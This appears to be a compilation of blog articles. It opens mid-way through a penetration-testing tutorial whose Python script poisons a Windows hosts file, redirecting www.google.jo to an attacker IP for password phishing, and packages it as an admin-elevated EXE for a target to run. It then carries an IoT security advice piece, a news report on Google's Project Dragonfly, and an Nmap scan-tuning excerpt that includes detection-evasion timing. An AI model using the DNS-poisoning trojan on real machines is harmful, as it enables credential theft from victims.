CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

# Flush the cached DNS, to make sure that new sessions will take the new DNS record
command = "ipconfig /flushdns"
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

The first thing we do is change our current working directory to that of the hosts file, using the os library. Then, using subprocess, we append a static DNS record, pointing www.google.jo to 10.10.10.100: the Kali IP address. In the last step, we flush the DNS cache. We can now save the file and export the script into an EXE. Remember that we need to make the target execute it as admin. To do that, in the setup file for py2exe, we add a new line, as follows:

...
windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}],
...

So, we have added a new option specifying that when the target executes the EXE file, it will ask to elevate its privilege to admin. Let's run the setup file and start a new capture. Now, I will copy our EXE file onto the desktop. Notice that the file icon has a little shield, indicating that this file needs admin privileges, which will give us the exact result of running as admin. Now, let's run the file. Verify that the hosts file gets modified; you will see that our line has been added. Now, open a new session and we will see whether we get the redirection.
So, let's start a new capture and navigate to the site in Firefox. As you will see, the DNS lookup for google.jo points to our IP address, 10.10.10.100. We have now learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading this post, do check out Python For Offensive PenTest to learn how to hack passwords and perform privilege escalation on Windows with practical examples.
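To confirm programmatically that the poisoned record is in place, you can parse the hosts file rather than eyeballing the output of type hosts. The following is a small Python 3 sketch (the parse_hosts helper is my own illustration, not from the book) that maps hostnames to IPs, skipping comments and blank lines:

```python
def parse_hosts(text):
    """Map each hostname in hosts-file text to its IP address.
    Comment lines (starting with '#') and blanks are skipped."""
    mapping = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop inline comments
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            mapping[name] = ip
    return mapping

sample = """
# poisoned entry appended by the attacker
127.0.0.1    localhost
10.10.10.100 www.google.jo
"""
hosts = parse_hosts(sample)
assert hosts["www.google.jo"] == "10.10.10.100"
assert hosts["localhost"] == "127.0.0.1"
print(hosts)
```

In a real check you would read the text from the platform's hosts path (C:\Windows\System32\drivers\etc\hosts on Windows, /etc/hosts on Linux) and assert that the expected hostname maps to the attacker's IP.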


How to stop hackers from messing with your home network (IoT)

Guest Contributor
16 Oct 2018
8 min read
This week, NCCIC, in collaboration with the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States, released a joint Activity Alert Report. What is alarming in the findings is that a majority of sophisticated exploits on secure networks are being carried out by attackers using freely available tools that find loopholes in security systems.

The Internet of Things (IoT) is broader than most people realize. It involves diverse elements that make it possible to transfer data from a point of origin to a destination. Various Internet-ready mechanical devices, computers, and phones are part of your IoT, from servers and networks down to the tracking chip in your pet's collar. Your IoT does not require person-to-person interaction. It also doesn't require person-to-device interaction, but it does require device-to-device connections and interactions. What does all this mean to you? It means hackers have more points of entry into your personal IoT than you ever dreamed of. Here are some of the ways they can infiltrate your personal IoT devices, along with some suggestions on how to keep them out.

Your home network

How many functions are controlled via a home network? From your security system to activating lighting at dusk to changing the setting on the thermostat, many people set up automatic tasks or use remote access to manually adjust all sorts of things. It's convenient, but it comes with a degree of risk.

(Image courtesy of HotForSecurity.BitDefender.com)

Hackers who are able to detect and penetrate the wireless home network via your thermostat or lighting system eventually burrow into other areas, like the hard drive where you keep financial documents. Before you know it, you're a ransomware victim. Too many people think their OS firewall will protect them, but by the time a hacker runs into that, they're already in your computer and can jump out to the wireless devices we've been talking about.
What can you do about it? Take a cue from your bank. Have you ever tried to access your account from a device that the bank doesn't recognize? If so, then you know the bank's system requires you to provide additional means of identification, like a fingerprint scan or answering a security question. That process is called multifactor authentication. Unless the hacker can provide more information, the system blocks the attempt. Make sure your home network is set up to require additional authentication when any device other than your phone, home computer, or tablet is used.

Spyware/Malware from websites and email attachments

Hacking via email attachments, or picking up spyware and malware through visits to unsecured sites, is still possible. Since these typically download to your hard drive and run in the background, you may not notice anything at all for a time. All the while, your data is being harvested.

You can do something about it. Keep your security software up to date and always load the latest release of your firewall. Never open attachments with unusual extensions, even if they appear to be from someone you know. Always use your security software to scan attachments of any kind rather than relying solely on the security measures employed by your email client. Only visit secure sites. If the site address begins with “http” rather than “https”, that’s a sign you need to leave it alone. Remember to update your security software at least once a week. Automatic updates are a good thing. Don’t forget to initiate a full system scan at least once a week, even if there are no apparent problems. Do so after making sure you've downloaded and installed the latest security updates.

Your pet’s microchip

The point of a pet chip is to help you find your pet if it wanders away or is stolen. While not GPS-enabled, it’s possible to scan the chip on an animal who ends up in an animal shelter or clinic and confirm a match. Unfortunately, that function is managed over a network.
That means hackers can use it as a gateway.

(Image courtesy of HowStuffWorks.com)

Network security determines how vulnerable you are in terms of who can access the databases and come up with a match. Your best bet is to find out what security measures the chip manufacturer employs, including how often those measures are updated. If you don’t get straight answers, go with a competitor’s chip.

Your child’s toy

Have you ever heard of a doll named Cayla? It’s popular in Germany and also happens to be Wi-Fi enabled. That means hackers can gain access to the camera and microphone included in the doll’s design. Wherever the doll is carried, it’s possible to gather data that can be used for all sorts of activities. That includes capturing information about passwords, PIN codes, and anything else that’s in range of the camera or the microphone.

Internet-enabled toys need to be checked for spyware regularly. More manufacturers now provide detectors in their toy designs. You may still need to initiate those scans and keep the software updated. This increases the odds that the toy remains a toy and doesn’t become a spy for some hacker.

Infection from trading electronic files

It seems pretty harmless to accept a digital music file from a friend. In most cases, there is no harm. Unfortunately, your friend’s digital music collection may already be corrupted. Once you load a corrupted file onto your hard drive, your computer can become part of a botnet running behind your own home network.

(Image courtesy of AlienVault.com)

Whenever you receive a digital file, either via email or from someone stopping by with a jump drive, always use your security software to scan it before downloading it into your system. The software should be able to catch the infection. If you find anything, let your friend know so he or she can take steps to debug the original file.

These are only a few examples of how your IoT can be hacked and lead to data theft or corruption.
As with any type of internet-based infection, there are new strategies developed daily.

How Blockchain might help

There’s one major IoT design flaw that allows hackers to easily get into a system, and that is the centralized nature of the network’s decision-making. There is a single point of control through which all requests are routed and decisions are made. A hacker has only to penetrate this singular authority to take control of everything, because individual devices can’t decide on their own what constitutes a threat.

Interestingly enough, the blockchain technology that underpins Bitcoin and many other cryptocurrencies might eventually provide a solution to the extremely hackable state of the IoT as presently configured. While not a perfect solution, the decentralized nature of blockchain has a lot of companies spending plenty on research and development for eventual deployment to a host of uses, including the IoT.

The advantage blockchain technology offers to IoT is that it removes the single point of control and allows each device on a network to work in conjunction with the others to detect and thwart hack attempts. Blockchain works through group consensus. This means that in order to take control of a system, a bad actor would have to take control of a majority of the devices all at once, which is an exponentially harder task than breaking through the single point of control model. If a blockchain-powered IoT network detects an intrusion attempt and the group decides it is malicious, it can be quarantined so that no damage occurs to the network. That’s the theory, anyway.

Since blockchain is an almost brand new technology, there are hurdles to be overcome before it can be deployed on a wide scale as a solution to IoT security problems. Here are a few:

Computing power costs - It takes plenty of computer resources to run a blockchain. More than the average household owner is willing to pay right now.
That’s why the focus is on industrial IoT uses at present.

Legal issues - If you have AI-powered devices making decisions on their own, who will bear ultimate responsibility when things go wrong?

Volatility - The development around blockchain is young and unpredictable. Investing in a solution right now might mean having to buy all new equipment in a year.

Final Thoughts

One thing is certain. We have a huge problem (IoT security) and what might eventually offer a solid solution (blockchain technology). Expect the path to get from here to there to be filled with potholes and dead ends, but stay tuned. The potential for a truly revolutionary technology to come into its own is definitely in the mix.

About Gary Stevens

Gary Stevens is a front-end developer. He's a full-time blockchain geek and a volunteer working for the Ethereum foundation as well as an active GitHub contributor.

Defending your business from the next wave of cyberwar: IoT Threats
5 DIY IoT projects you can build under $50
IoT botnets Mirai and Gafgyt target vulnerabilities in Apache Struts and SonicWall
Sugandha Lahoti
30 Nov 2018
5 min read
Google bypassed its own security and privacy teams for Project Dragonfly reveals Intercept

Google’s Project Dragonfly has faced significant criticism and scrutiny from both the public and Google employees. In a major report yesterday, the Intercept revealed how internal conversations around Google’s censored search engine for China shut out Google’s legal, privacy, and security teams. According to named and anonymous senior Googlers who worked on the project and spoke to The Intercept's Ryan Gallagher, company executives appeared intent on watering down the privacy review. Google bosses also worked to suppress employee criticism of the censored search engine.

Project Dragonfly is the secretive search engine that Google is allegedly developing to comply with Chinese censorship rules. It was kept secret from the company at large during the 18 months it was in development, until an insider leak led to its existence being revealed in The Intercept. Since then, it has been on the receiving end of constant backlash from various human rights organizations and investigative reporters. Earlier this week, it also faced criticism from the human rights organization Amnesty International, followed by Google employees signing a petition protesting the project.

The secretive way Google operated Dragonfly

The majority of the leaks were reported by Yonatan Zunger, a security engineer on the Dragonfly team. He was asked to produce the privacy review for the project in early 2017. However, he faced opposition from Scott Beaumont, Google’s top executive for China and Korea. According to Zunger, Beaumont “wanted the privacy review of [Dragonfly] to be pro forma and thought it should defer entirely to his views of what the product ought to be.
He did not feel that the security, privacy, and legal teams should be able to question his product decisions, and maintained an openly adversarial relationship with them — quite outside the Google norm.”

Beaumont also micromanaged the project and ensured that discussions about Dragonfly, and access to documents about it, were under his tight control. Members of the Dragonfly team who broke the strict confidentiality rules risked having their contracts at Google terminated.

Privacy report by Zunger

In the midst of all these conditions, Zunger and his team were still able to produce a privacy report. The report outlined problematic scenarios that could arise if the search engine were launched in China. It noted that, in China, it would be difficult for Google to legally push back against government requests, refuse to build systems specifically for surveillance, or even notify people of how their data may be used. Zunger’s meetings with the company’s senior leadership to discuss the privacy report were repeatedly postponed. Zunger said, “When the meeting did finally take place, in late June 2017, I and my team were not notified, so we missed it and did not attend. This was a deliberate attempt to exclude us.”

Dragonfly: Not just an experiment

The Intercept’s report even demolished Sundar Pichai’s recent public statement on Dragonfly, in which he described it as “just an experiment,” adding that it remained unclear whether the company “would or could” eventually launch it in China. Google employees were surprised when they were told to prepare the search engine for launch between January and April 2019, or sooner. “What Pichai said [about Dragonfly being an experiment] was ultimately horse shit,” said one Google source with knowledge of the project. “This was run with 100 percent intention of launch from day one.
He was just trying to walk back a delicate political situation.” It is also alleged that Beaumont had intended from day one that the project should only be known about once it had launched. “He wanted to make sure there would be no opportunity for any internal or external resistance to Dragonfly,” said one Google source to the Intercept.

This makes us wonder to what extent Google is really concerned about upholding its founding values, and how far it will go in advocating internet freedom, openness, and democracy. It now looks a lot like a company that simply prioritizes growth and expansion into new markets, even if that means compromising on issues like internet censorship and surveillance. Perhaps we shouldn’t be surprised.

Google CEO Sundar Pichai is expected to testify in Congress on Dec. 5 to discuss transparency and bias. Members of Congress will likely also ask about Google's plans in China.

Public opinion on the Intercept’s report is largely supportive.

https://twitter.com/DennGordon/status/1068228199149125634
https://twitter.com/mpjme/status/1068268991238541312
https://twitter.com/cynthiamw/status/1068240969990983680

Google employee and inclusion activist Liz Fong-Jones tweeted that she would match $100,000 in pledged donations to a fund to support employees who refuse to work in protest.

https://twitter.com/lizthegrey/status/1068212346236096513

She has also shown full support for Zunger.

https://twitter.com/lizthegrey/status/1068209548320747521

Google employees join hands with Amnesty International urging Google to drop Project Dragonfly
OK Google, why are you ok with mut(at)ing your ethos for Project DragonFly?
Amnesty International takes on Google over Chinese censored search engine, Project Dragonfly
Packt
23 Jun 2017
20 min read
How to Optimize Scans

In this article by Paulino Calderon Pale, author of the book Nmap Network Exploration and Security Auditing Cookbook, Second Edition, we will explore the following topics:

Skipping phases to speed up scans
Selecting the correct timing template
Adjusting timing parameters
Adjusting performance parameters

One of my favorite things about Nmap is how customizable it is. If configured properly, Nmap can be used to scan from single targets to millions of IP addresses in a single run. However, we need to be careful: we need to understand the configuration options and scanning phases that can affect performance, but most importantly, we need to really think about our scan objective beforehand. Do we need the information from the reverse DNS lookup? Do we know all targets are online? Is the network congested? Do targets respond fast enough? These and many more aspects can really add to your scanning time. Therefore, optimizing scans is important and can save us hours if we are working with many targets.

This article starts by introducing the different scanning phases, timing, and performance options. Unless we have a solid understanding of what goes on behind the curtains during a scan, we won't be able to completely optimize our scans. Timing templates are designed to work in common scenarios, but we want to go further and shave off those extra seconds per host during our scans. Remember that this can improve not only performance but accuracy as well. Maybe those targets marked as offline were simply too slow to respond to the probes after all.

Skipping phases to speed up scans

Nmap scans can be broken into phases. When we are working with many hosts, we can save time by skipping tests or phases that return information we don't need or that we already have. By carefully selecting our scan flags, we can significantly improve the performance of our scans.
This section explains the process that takes place behind the curtains when scanning, and how to skip certain phases to speed up scans.

How to do it...

To perform a full port scan with the timing template set to aggressive, and without the reverse DNS resolution (-n) or ping (-Pn), use the following command:

# nmap -T4 -n -Pn -p- 74.207.244.221

Note the scanning time at the end of the report:

Nmap scan report for 74.207.244.221
Host is up (0.11s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open ssh
80/tcp   open http
9929/tcp open nping-echo
Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds

Now, compare the running time that we get if we don't skip any tests:

# nmap -p- scanme.nmap.org
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.11s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open ssh
80/tcp   open http
9929/tcp open nping-echo
Nmap done: 1 IP address (1 host up) scanned in 77.45 seconds

Although the time difference isn't very drastic, it really adds up when you work with many hosts. I recommend that you think about your objectives and the information you need, and consider the possibility of skipping some of the scanning phases that we will describe next.

How it works...

Nmap scans are divided into several phases. Some of them require certain arguments to be set in order to run, but others, such as the reverse DNS resolution, are executed by default. Let's review the phases that can be skipped and their corresponding Nmap flags:

Target enumeration: In this phase, Nmap parses the target list. This phase can't exactly be skipped, but you can save DNS forward lookups by using only IP addresses as targets.

Host discovery: This is the phase where Nmap establishes if the targets are online and in the network. By default, Nmap sends an ICMP echo request and some additional probes, but it supports several host discovery techniques that can even be combined.
To skip the host discovery phase (no ping), use the flag -Pn. We can easily see which probes we skipped by comparing the packet traces of the two scans:

$ nmap -Pn -p80 -n --packet-trace scanme.nmap.org
SENT (0.0864s) TCP 106.187.53.215:62670 > 74.207.244.221:80 S ttl=46 id=4184 iplen=44 seq=3846739633 win=1024 <mss 1460>
RCVD (0.1957s) TCP 74.207.244.221:80 > 106.187.53.215:62670 SA ttl=56 id=0 iplen=44 seq=2588014713 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.11s latency).
PORT   STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

For scanning without skipping host discovery, we use the command:

$ nmap -p80 -n --packet-trace scanme.nmap.org
SENT (0.1099s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=59 id=12270 iplen=28
SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:443 S ttl=59 id=38710 iplen=44 seq=1913383349 win=1024 <mss 1460>
SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:80 A ttl=44 id=10665 iplen=40 seq=0 win=1024
SENT (0.1102s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=51 id=42939 iplen=40
RCVD (0.2120s) ICMP 74.207.244.221 > 106.187.53.215 Echo reply (type=0/code=0) ttl=56 id=2147 iplen=28
SENT (0.2731s) TCP 106.187.53.215:43199 > 74.207.244.221:80 S ttl=51 id=34952 iplen=44 seq=2609466214 win=1024 <mss 1460>
RCVD (0.3822s) TCP 74.207.244.221:80 > 106.187.53.215:43199 SA ttl=56 id=0 iplen=44 seq=4191686720 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

Reverse DNS resolution: Host names often reveal additional information by themselves, and Nmap uses reverse DNS lookups to obtain them. This step can be skipped by adding the argument -n to your scan arguments.
Let's see the traffic generated by the two scans, with and without reverse DNS resolution. First, let's skip reverse DNS resolution by adding -n to the command:

$ nmap -n -Pn -p80 --packet-trace scanme.nmap.org
SENT (0.1832s) TCP 106.187.53.215:45748 > 74.207.244.221:80 S ttl=37 id=33309 iplen=44 seq=2623325197 win=1024 <mss 1460>
RCVD (0.2877s) TCP 74.207.244.221:80 > 106.187.53.215:45748 SA ttl=56 id=0 iplen=44 seq=3220507551 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

Now let's try the same command, but without skipping reverse DNS resolution:

$ nmap -Pn -p80 --packet-trace scanme.nmap.org
NSOCK (0.0600s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8
NSOCK (0.0600s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18
NSOCK (0.0600s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24
NSOCK (0.0600s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34
NSOCK (0.0600s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40
NSOCK (0.0600s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50
NSOCK (0.0600s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: =............221.244.207.74.in-addr.arpa.....
NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53]
NSOCK (0.0600s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53]
NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53]
NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53]
NSOCK (0.0620s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes)
NSOCK (0.0620s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66
NSOCK (0.0620s) nsi_delete() (IOD #1)
NSOCK (0.0620s) msevent_cancel() on event #66 (type READ)
NSOCK (0.0620s) nsi_delete() (IOD #2)
NSOCK (0.0620s) msevent_cancel() on event #34 (type READ)
NSOCK (0.0620s) nsi_delete() (IOD #3)
NSOCK (0.0620s) msevent_cancel() on event #50 (type READ)
SENT (0.0910s) TCP 106.187.53.215:46089 > 74.207.244.221:80 S ttl=42 id=23960 iplen=44 seq=1992555555 win=1024 <mss 1460>
RCVD (0.1932s) TCP 74.207.244.221:80 > 106.187.53.215:46089 SA ttl=56 id=0 iplen=44 seq=4229796359 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Port scanning: In this phase, Nmap determines the state of the ports. By default, it uses SYN or TCP Connect scanning depending on the user's privileges, but several other port scanning techniques are supported. Although this may not be so obvious, Nmap can do a few different things with targets without port scanning them, like resolving their DNS names or checking whether they are online.
For this reason, this phase can be skipped with the argument -sn:

$ nmap -sn -R --packet-trace 74.207.244.221
SENT (0.0363s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=56 id=36390 iplen=28
SENT (0.0364s) TCP 106.187.53.215:53376 > 74.207.244.221:443 S ttl=39 id=22228 iplen=44 seq=155734416 win=1024 <mss 1460>
SENT (0.0365s) TCP 106.187.53.215:53376 > 74.207.244.221:80 A ttl=46 id=36835 iplen=40 seq=0 win=1024
SENT (0.0366s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=50 id=2630 iplen=40
RCVD (0.1377s) TCP 74.207.244.221:443 > 106.187.53.215:53376 RA ttl=56 id=0 iplen=40 seq=0 win=0
NSOCK (0.1660s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8
NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18
NSOCK (0.1660s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24
NSOCK (0.1660s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34
NSOCK (0.1660s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40
NSOCK (0.1660s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50
NSOCK (0.1660s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: [............221.244.207.74.in-addr.arpa.....
NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53]
NSOCK (0.1660s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53]
NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53]
NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53]
NSOCK (0.1660s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes)
NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66
NSOCK (0.1660s) nsi_delete() (IOD #1)
NSOCK (0.1660s) msevent_cancel() on event #66 (type READ)
NSOCK (0.1660s) nsi_delete() (IOD #2)
NSOCK (0.1660s) msevent_cancel() on event #34 (type READ)
NSOCK (0.1660s) nsi_delete() (IOD #3)
NSOCK (0.1660s) msevent_cancel() on event #50 (type READ)
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

In the previous example, we can see that an ICMP echo request and a reverse DNS lookup were performed (we forced DNS lookups with the option -R), but no port scanning was done.

There's more...

I recommend that you also run a couple of test scans to measure the speeds of the different DNS servers. I've found that ISPs tend to have the slowest DNS servers, but you can make Nmap use different DNS servers by specifying the argument --dns-servers. For example, to use Google's DNS servers, use the following command:

# nmap -R --dns-servers 8.8.8.8,8.8.4.4 -O scanme.nmap.org

You can test your DNS server speed by comparing the scan times. The following command tells Nmap not to ping or port scan, and only perform a reverse DNS lookup:

$ nmap -R -Pn -sn 74.207.244.221
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up.
Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix, Scanning Phases, for more information.
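If you want to compare several resolvers without eyeballing the output, you can time the reverse-lookup-only scan against each one and parse the elapsed time from Nmap's closing summary line. Below is a minimal sketch of that comparison; the helper names and the hard-coded sample outputs are illustrative assumptions, not part of Nmap itself:

```python
import re

def scan_seconds(nmap_output: str) -> float:
    """Extract the elapsed time from Nmap's 'Nmap done' summary line."""
    m = re.search(r"scanned in ([\d.]+) seconds", nmap_output)
    if not m:
        raise ValueError("no 'Nmap done' summary found")
    return float(m.group(1))

def fastest_resolver(results: dict) -> str:
    """Given {resolver: nmap_output}, return the resolver with the lowest scan time."""
    return min(results, key=lambda r: scan_seconds(results[r]))

# Sample outputs as they might appear from:
#   nmap -R -Pn -sn --dns-servers <resolver> 74.207.244.221
results = {
    "8.8.8.8": "Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds",
    "isp-default": "Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds",
}
print(fastest_resolver(results))  # → 8.8.8.8
```

In practice you would capture each run with subprocess and feed the real output into scan_seconds, then pass the winner to --dns-servers for your large scans.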
Selecting the correct timing template

Nmap includes six templates that set different timing and performance arguments to optimize your scans based on network conditions. Even though Nmap automatically adjusts some of these values, it is recommended that you set the correct timing template to hint Nmap about the speed of your network connection and the target's response time. The following will teach you about Nmap's timing templates and how to choose the most appropriate one.

How to do it...

Open your terminal and type the following command to use the aggressive timing template (-T4). Let's also use debugging (-d) to see what the option -T4 sets:

# nmap -T4 -d 192.168.4.20
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 500, min 100, max 1250
max-scan-delay: TCP 10, UDP 1000, SCTP 10
parallelism: min 0, max 0
max-retries: 6, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------
<Scan output removed for clarity>

You may use the integers between 0 and 5, for example, -T[0-5].

How it works...

The option -T is used to set the timing template in Nmap. Nmap provides six timing templates to help users tune the timing and performance arguments.
The available timing templates and their initial configuration values are as follows:

Paranoid (-0)—This template is useful to avoid detection systems, but it is painfully slow because only one port is scanned at a time, and the timeout between probes is 5 minutes:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 300000, min 100, max 300000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 1
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Sneaky (-1)—This template is useful for avoiding detection systems but is still very slow:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 15000, min 100, max 15000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 1
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Polite (-2)—This template is used when scanning is not supposed to interfere with the target system; it is a very conservative and safe setting:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 1
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Normal (-3)—This is Nmap's default timing template, which is used when the argument -T is not set:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Aggressive (-4)—This is the recommended timing template for broadband and Ethernet connections:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 500, min 100, max 1250
max-scan-delay: TCP 10, UDP 1000, SCTP 10
parallelism: min 0, max 0
max-retries: 6, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Insane (-5)—This timing template sacrifices accuracy for speed:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 250, min 50, max 300
max-scan-delay: TCP 5, UDP 1000, SCTP 5
parallelism: min 0, max 0
max-retries: 2, host-timeout: 900000
min-rate: 0, max-rate: 0
---------------------------------------------

There's more...

An interactive mode in Nmap allows users to press keys to dynamically change runtime variables, such as verbosity, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times on the development mailing list, this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883.

Adjusting timing parameters

Nmap not only adjusts itself to different network and target conditions while scanning, but it can also be fine-tuned using timing options to improve performance. Nmap automatically calculates packet round trip, timeout, and delay values, but these values can also be set manually through specific settings. The following describes the timing parameters supported by Nmap.

How to do it...
Enter the following command to adjust the initial round trip timeout, the delay between probes, and a timeout for each scanned host:

# nmap -T4 --scan-delay 1s --initial-rtt-timeout 150ms --host-timeout 15m -d scanme.nmap.org
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 150, min 100, max 1250
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 6, host-timeout: 900000
min-rate: 0, max-rate: 0
---------------------------------------------

How it works...

Nmap supports different timing arguments that can be customized. However, setting these values incorrectly will most likely hurt performance rather than improve it. Let's examine each timing parameter more closely and learn its Nmap option name.

The Round Trip Time (RTT) value is used by Nmap to know when to give up on or retransmit a probe. Nmap estimates this value by analyzing previous responses, but you can set the initial RTT timeout with the argument --initial-rtt-timeout, as shown in the following command:

# nmap -A -p- --initial-rtt-timeout 150ms <target>

In addition, you can set the minimum and maximum RTT timeout values with --min-rtt-timeout and --max-rtt-timeout, respectively, as shown in the following command:

# nmap -A -p- --min-rtt-timeout 200ms --max-rtt-timeout 600ms <target>

Another very important setting we can control in Nmap is the waiting time between probes. Use the arguments --scan-delay and --max-scan-delay to set the waiting time and the maximum amount of time allowed between probes, respectively, as shown in the following commands:

# nmap -A --max-scan-delay 10s scanme.nmap.org
# nmap -A --scan-delay 1s scanme.nmap.org

Note that the arguments shown previously are very useful for avoiding detection mechanisms. Be careful not to set --max-scan-delay too low, because doing so will most likely cause you to miss ports that are open.

There's more...
If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout:

# nmap -sV -A -p- --host-timeout 5m <target>

Estimating round trip times with Nping

To use Nping to estimate the round trip time between you and the target, the following command can be used:

# nping -c30 <target>

This will make Nping send 30 ICMP echo request packets, and after it finishes, it will show the average, minimum, and maximum RTT values obtained:

# nping -c30 scanme.nmap.org
...
SENT (29.3569s) ICMP 50.116.1.121 > 74.207.244.221 Echo request (type=8/code=0) ttl=64 id=27550 iplen=28
RCVD (29.3576s) ICMP 74.207.244.221 > 50.116.1.121 Echo reply (type=0/code=0) ttl=63 id=7572 iplen=28
Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms
Raw packets sent: 30 (840B) | Rcvd: 30 (840B) | Lost: 0 (0.00%)
Tx time: 29.09096s | Tx bytes/s: 28.87 | Tx pkts/s: 1.03
Rx time: 30.09258s | Rx bytes/s: 27.91 | Rx pkts/s: 1.00
Nping done: 1 IP address pinged in 30.47 seconds

Examine the round trip times and use the maximum to set the correct --initial-rtt-timeout and --max-rtt-timeout values. The official documentation recommends using double the maximum RTT value for --initial-rtt-timeout, and as high as four times the maximum round trip time value for --max-rtt-timeout.

Displaying the timing settings

Enable debugging to make Nmap report the timing settings before scanning:

$ nmap -d <target>
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix, Scanning Phases, for more information.
